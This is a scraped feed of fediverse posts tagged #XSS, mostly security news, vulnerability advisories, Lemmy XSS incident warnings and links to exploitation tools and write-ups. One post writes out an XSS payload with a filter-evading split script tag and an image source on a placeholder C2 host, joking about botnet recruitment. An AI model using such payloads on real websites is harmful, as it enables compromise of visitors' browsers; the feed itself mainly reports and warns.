nette_news, to programming
@nette_news@phpc.social avatar

🥳 Latte 3.0.15 was released!

Latte - the first truly secure and
intuitive templates for PHP.

https://github.com/nette/latte/releases/tag/v3.0.15
https://nette.org/en/releases
https://latte.nette.org/

simontsui, to random

Hot off the press! CISA adds CVE-2023-43770 (6.1 medium) Roundcube Webmail Persistent Cross-Site Scripting (XSS) Vulnerability to the Known Exploited Vulnerabilities (KEV) Catalog.
🔗 (to be replaced later) https://www.cisa.gov/known-exploited-vulnerabilities-catalog

#CISA #KEV #KnownExploitedVulnerabilitiesCatalog #vulnerability #eitw #Roundcube #XSS #activeexploitation #CVE_2023_43770

r1cksec, to infosec

New cheatsheets pushed 🕵️‍♂️​

https://github.com/r1cksec/cheatsheets

Including:

A nice writeup about a XSS vulnerability found on chess.com♟️​
https://skii.dev/rook-to-xss

This tool can be used as a framework for CI/CD security analysis :github:​
https://github.com/CycodeLabs/raven

A great post about Process Injection in the context of Kernel Triggered Memory Scans :hacked:​
https://www.r-tec.net/r-tec-blog-process-injection-avoiding-kernel-triggered-memory-scans.html

#infosec #cybersecurity #pentest #xss #redteam #git #github #windows #shellcode

teriradichel, to AWS

A Firewall For AWS CloudShell
~~
ACM.446 Attempting to prevent outbound credential exfiltration via self-XSS
~~
#cloudshell #xss #credentials #container #aws #security #firewall

https://medium.com/cloud-security/a-firewall-for-aws-cloudshell-8c07bc026415

mima, to lemmy

's recent vulnerability and their handling of it is still miles better than 's exploit which actually took down a big instance and is something even more elementary than what Sharkey experienced.

Like seriously, the first thing you do when parsing is involved is to sanitize the hell out of it, both in the Markdown input and the HTML output. And you put up a strict for good measure. Lemmy spectacularly failed on both counts, despite existing as a project for years and a lot more instances (and therefore users, which rivals ) using their software!

I can cut some slack for the Sharkey devs here because:

  • they're relatively new (only months since the project started)
  • it only affected note imports from which is already niche enough
  • it was easy to mitigate (just disable note import)
  • it didn't affect single-user instances IIUC
  • I haven't seen any Sharkey instance get actually exploited by this
  • they're taking steps to make sure this shit doesn't happen again (haven't seen this from Lemmy yet, and last I checked their CSP is still shit)

So this is not worth blowing over in the . Your assessment is exaggerated, this energy could've been spent somewhere else, and you owe the Sharkey devs an apology.

RE: https://meowcity.club/fedi/tetra/p/1706812792.496325

heisec, to security German

Informationsleck in "Counter-Strike 2": Manipulierte Namen erlaubten IP-Abgriff

Wer seinen Spielernamen in "Counter-Strike 2" zu einem HTML-Tag änderte, konnte mittels eines Webservers die IP-Adressen der Mitspieler abgreifen.

https://www.heise.de/news/Informationsleck-in-Counter-Strike-2-Manipulierte-Namen-erlaubten-IP-Abgriff-9572084.html?wt_mc=sm.red.ho.mastodon.mastodon.md_beitraege.md_beitraege

#Security #XSS #news

acrypthash, to security

I am a big CS2 player. I hope this can get resolved quickly.

https://www.pcgamesn.com/counter-strike-2/ip-exploit

heisec, to security German

Entwicklungsplattform: Neue GitLab-Versionen beheben zehn Sicherheitslücken

Neben Cross-Site-Scripting und Rechteproblemen beheben die neuen Versionen der Versionsverwaltung auch DoS-Lücken. Das GitLab-Team empfiehlt ein Update.

https://www.heise.de/news/Entwicklungsplattform-Neue-GitLab-Versionen-beheben-zehn-Sicherheitsluecken-9547411.html?wt_mc=sm.red.ho.mastodon.mastodon.md_beitraege.md_beitraege

#XSS #Git #Security #news

heisec, to machinelearning German

Sicherheitsforscher finden kritische Fehler in KI-Werkzeugen Ray, MLflow und H2O

Die beliebten Werkzeuge für KI-Anwendungen leiden unter Codeschmuggel, illegitimen Dateimanipulationen und anderen Bugs. Nicht immer sind Updates verfügbar.

https://www.heise.de/news/Sicherheitsforscher-finden-kritische-Fehler-in-KI-Werkzeugen-Ray-MLflow-und-H2O-9534429.html?wt_mc=sm.red.ho.mastodon.mastodon.md_beitraege.md_beitraege

#XSS #KünstlicheIntelligenz #MachineLearning #Security #news

heisec, to security German

Code-Schmuggel: Neue Splunk-Versionen beheben Sicherheitslücken

Unsichere XML-Verarbeitung und ungenügende Prüfung von Logeinträgen ermöglichten Angreifern, eigenen Code in Splunk-Produkte zu schleusen.

https://www.heise.de/news/Code-Schmuggel-Neue-Splunk-Versionen-beheben-Sicherheitsluecken-9533636.html?wt_mc=sm.red.ho.mastodon.mastodon.md_beitraege.md_beitraege

#XSS #Security #news

heisec, to security German

Schwere Sicherheitslücken in Monitoring-Software Zabbix behoben

In verschiedenen Komponenten der Monitoringsoftware Zabbix klafften kritische Sicherheitslücken, die Angreifern die Ausführung eigenen Codes ermöglichen.

https://www.heise.de/news/Schwere-Sicherheitsluecken-in-Monitoring-Software-Zabbix-behoben-9333656.html?wt_mc=sm.red.ho.mastodon.mastodon.md_beitraege.md_beitraege

#Security #XSS #news

rceninja, to infosec

I'm usually a grey hat but my evil brain commands me to insert that crafted webp image (#libwebp ) and upload that to popular websites using #XSS </scrip</script>t><img src ="https:myc2server.fy/payload.webp" onerror=prompt(8)> and get RCE into users computers and add them to the botnet lol

Prevention : add .webp extention to ublock origin custom rules or on the whole DNS level.

#infosec #cybersecurity #tip #mastodon #security #oscp

doyensec, to random

Introducing Session Hijacking Visual Exploitation (SHVE): A new tool for taking #xss exploitation to the next level - remotely viewing a target's browser

Details on our blog: https://blog.doyensec.com/2023/08/31/introducing-session-hijacking-visual-exploitation.html

Download it today: https://github.com/doyensec/Session-Hijacking-Visual-Exploitation/

#doyensec #appsec #appsecurity #websecurity

voidstar, to javascript

New blog post :)

Hacking GTA V RP Servers Using Web Exploitation Techniques

https://www.nullpt.rs/hacking-gta-servers-using-web-exploitation

#javascript #xss #gamehacking #reverseengineering

tulpa, to random
@tulpa@fosstodon.org avatar

@Tutanota I see that there have been a few #XSS vulnerabilities in the clients in the past. In that case, the client credentials could be stolen from the client.

Is there any mitigation in place for this? Like, would the credentials not be accepted if coming from a different IP, something like that?

Of course the protections against XSS are valuable. But we can't assume there won't be more vulnerabilities in the future.

tulpa, to bitwarden
@tulpa@fosstodon.org avatar

#Bitwarden, like most cloud-based password managers, has a web vault.Imagine a stored #XSS on that. All your passwords stolen.

Thankfully, you probably aren't viewing untrusted content if you're an individual user (you put the data in yourself and now you're getting it back out). But for organization users, where you can see things created by someone else on your subscription? That could be possible.

losttourist, (edited ) to fediverse

Edit: there is now a mitigation available. It should be safe to use Lemmy again as long as your instance has applied the fix.

https://lemmy.world/post/1293336

Yep, it looks like there is a XSS vulnerability with Lemmy that has been widely exploited, allowing the attackers to steal cookie credentials including potentially those of the site admins.

Some other non-compromised Lemmy instances have taken themselves offline until a fix is available.

Kbin is not affected as far as I can see.

If you have a Lemmy account, don't use it at the moment!

#Lemmy #Fediverse #Threadiverse #XSS #infosec

techconsulnerd, to fediverse

Lemmy instances are being attacked by XSS attack. Stay cautious when viewing post with weird text as it is a JavaScript injection. Bug reported to Lemmy devs https://github.com/LemmyNet/lemmy-ui/issues/1895

heisec, to mastodon German

Fediverse: Kritische Sicherheitslücken in Mastodon-Software abgedichtet

Betreiber von Mastodon-Instanzen müssen die Server aktualisieren. Ältere Versionen bringen kritische Sicherheitslücken mit, die etwa Codeschmuggel erlauben.

https://www.heise.de/news/Fediverse-Kritische-Sicherheitsluecken-in-Mastodon-Software-abgedichtet-9209526.html?wt_mc=sm.red.ho.mastodon.mastodon.md_beitraege.md_beitraege

#DoSSchwachstelle #Mastodon #Security #Sicherheitslücken #XSS #news

Awels, to Cybersecurity German

Is there a possible xss vector in any of These? I think they should all be fine

var id = url.searchParams.get("id");
var id_int= parseInt(division);

And

var id = url.searchParams.get("id");
var val = Object.values(data)[id];

#cybersecurity #xss #help

BishopFox, to opensource

New Bishop Fox security advisory alert 🚨 ! Joan Bono and Luis Adrian De la Rosa Hernandez identified two #vulnerabilities in the TaskCafe #opensource tool.

These vulnerabilities include a high-risk improper access controls issue as well as a cross-site scripting (#XSS) bug. If these two issues were exploited together, an attacker could take over the admin user's account by changing the profile picture to a malicious SVG and change the admin password to the one of their choosing. Read more ⬇
https://bfx.social/43K2M10

#infosec #hacking

0x58, to Cybersecurity

📨 Latest issue of my curated and list of resources for week /2023 is out! It includes, but not only:

→ 🇺🇸 🇨🇳 The US Navy, NATO, and are using a shady Chinese company’s chips
→ 🦠 🏢 Group Starts Naming Victims of Zero-Day Attacks
→ ☁️ 🪣 New Supply Chain Attack Exploits Abandoned to Distribute Malicious Binaries
→ ☁️ Vulnerabilities in Led to Unauthorized Access to User Sessions
→ 🇨🇳 🦠 ESG zero-day attacks linked to suspected Chinese hackers
→ 🇷🇺 🇺🇸 Russian national arrested in Arizona, charged for alleged role in ransomware attacks
→ 🇷🇺 🇺🇦 Russia-backed hackers unleash new USB-based malware on ’s military
→ 🇺🇸 💰 LockBit Ransomware Extorts $91 Million from U.S. Companies
→ 🇷🇺 🇺🇦 identifies new hacking unit within Russian military intelligence
→ 🦠 Fake Researcher Profiles Spread through Repositories as PoC Exploits
→ 🎣 👟 Massive campaign uses 6,000 sites to impersonate 100 brands
→ 🇨🇳 Chinese Cyberspies Caught Exploiting ESXi
→ 🩹 Microsoft , June 2023 Edition
→ ☁️ Microsoft: Azure Portal was caused by traffic “spike”
→ 🇨🇳 🇺🇸 's cyber now aimed at infrastructure, warns CISA boss
→ 🇰🇷 🇨🇳 Ex-Samsung executive alleged to have stolen tech to recreate chip plant in China
→ 🇨🇭 🗄️ Swiss Fear Government Data Stolen in Cyberattack
→ 🩹 🔐 fixes critical RCE flaw in SSL-VPN devices, patch now

📚 This week's recommended reading is: "The Cyber Effect: An Expert in Cyberpsychology Explains How Technology Is Shaping Our Children, Our Behavior, and Our Values — and What We Can Do About It" by Prof Mary Aiken

Subscribe to the to have it piping hot in your inbox every Sunday ⬇️

https://0x58.substack.com/p/infosec-mashup-week-242023

t_var_s, to php
@t_var_s@phpc.social avatar

If you're not aware of how prevalent #XSS can be, a web language like #PHP can make it really easy to build a vulnerable web service. You might not know that XSS can be reflected in a POST request and enable an attacker. Here is how: https://world.hey.com/ricardo.tavares/xss-in-json-post-requests-demo-included-4f2fbbe1

#blueteam #redteam

gcluley, to php
@gcluley@mastodon.green avatar
  • All
  • Subscribed
  • Moderated
  • Favorites
  • JUstTest
  • InstantRegret
  • mdbf
  • osvaldo12
  • magazineikmin
  • GTA5RPClips
  • rosin
  • thenastyranch
  • Youngstown
  • cubers
  • slotface
  • khanakhh
  • kavyap
  • DreamBathrooms
  • anitta
  • Durango
  • everett
  • ethstaker
  • cisconetworking
  • Leos
  • provamag3
  • modclub
  • ngwrru68w68
  • tacticalgear
  • tester
  • megavids
  • normalnudes
  • lostlight
  • All magazines